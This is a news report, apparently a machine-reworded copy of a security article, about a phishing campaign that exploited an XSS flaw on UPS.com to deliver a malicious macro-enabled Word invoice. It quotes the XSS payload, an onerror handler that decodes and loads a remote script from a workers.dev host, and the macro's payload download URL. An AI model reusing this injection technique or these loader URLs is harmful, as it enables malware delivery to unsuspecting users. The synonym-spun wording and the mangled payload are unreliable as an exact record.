Home Internet Security Phishing campaign uses UPS.com XSS vuln to distribute malware

Phishing campaign uses UPS.com XSS vuln to distribute malware



A intelligent UPS phishing marketing campaign utilized an XSS vulnerability in UPS.com to push faux and malicious ‘Bill’ Phrase paperwork.

The phishing rip-off was first found by safety analysis Daniel Gallagher and pretended to be an e mail from UPS stating {that a} package deal had an “exception” and must be picked up by the shopper.

What makes this phishing assault stand out is that the menace actor used the XSS vulnerability in UPS.com to switch the location’s common web page to seem like a official obtain web page.

This vulnerability allowed the menace actor to distribute a malicious doc by a distant Cloudflare employee however make it seem like it was being downloaded instantly from UPS.com.

Dissecting the UPS phishing rip-off

This e mail is full of quite a few official hyperlinks that carry out no malicious habits. Nonetheless, the monitoring quantity is a hyperlink to UPS’ website that features an exploit for an XSS vulnerability that injects malicious JavaScript into the browser when the web page is opened.

UPS phishing email
UPS phishing e mail
Photos don’t presently load because the attacker’s website is shut down

The cleaned-up model of the URL used for the monitoring quantity will be seen beneath, with the unique being additional obfuscated.

URL used in the phishing scam
URL used within the phishing rip-off

This URL has two attention-grabbing strings which can be used as a part of the assault, with the first merchandise of curiosity being the next base64 encoded string:


The base64 string incorporates a remark from the menace actor who helpfully explains that it’s used to make the URL longer to cover an XSS exploit question parameter appended to the top of the URL.

1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;)

This remark is attention-grabbing, as it is not frequent for menace actors to elucidate why an URL is created a sure approach for a phishing assault.

The second string of curiosity is the JavaScript XSS exploit injected into UPS.com when a consumer accesses the web site.

img src="https://www.bleepingcomputer.com/information/safety/phishing-campaign-uses-upscom-xss-vuln-to-distribute-malware/x" onerror="Operate(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

The decoded base64 string within the atob() perform incorporates the URL to a Cloudflare employee script that the vulnerability will load.


The Cloudflare employee script, captured by Gallagher on Urlscan, will trigger the UPS web page to show a message {that a} file is downloading 

Cloudflare worker script used as part of the UPS XSS exploit
Cloudflare employee script used as a part of the UPS XSS exploit

The Cloudflare employee script injected by the XSS vulnerability will trigger the UPS web site to show a downloading web page, as proven beneath.

Exploit causing the UPS page to show a downloading screen
Exploit inflicting the UPS web page to point out a downloading display screen

In the end, the web page will obtain the malicious Phrase doc [VirusTotal] from the attacker’s Cloudflare undertaking.

This phishing marketing campaign is so intelligent as a result of a consumer visiting the URL will see a official ups.com URL prompting a obtain of an bill.

This tactic will seemingly trigger the victims to open the Bill with much less suspicion, pondering it’s a actual file from UPS.

The UPS.com XSS vulnerability has since been fastened based mostly on BleepingComputer’s checks.

BleepingComputer has contacted UPS with questions concerning the assault however has not heard again presently.

The mysterious faux ‘Bill’ doc

The downloaded doc is called ‘invoice_1Z7301XR1412220178’ and pretends to be a delivery bill from UPS.

When opening the doc, all the textual content shall be unreadable, and the doc will immediate a consumer to ‘Allow Content material’ to view it appropriately.

Malicious Invoice word document
Malicious Bill phrase doc

When enabled, the macros will try to obtain a file https://divine-bar-3d75.visual-candy.staff.dev/blackhole.png. 

Nonetheless, this URL is now not working, so it’s not potential to see the payload.

Macros in fake UPS Invoice
Macros in faux UPS Bill 

This phishing rip-off illustrates the creativity and evolving strategies utilized by menace actors to distribute malicious information convincingly.

Whereas the e-mail sender clearly confirmed a suspicious area, because the XSS vulnerability allowed the URL and obtain web page to look legitimately from UPS, many individuals would have fallen for this rip-off.

Source link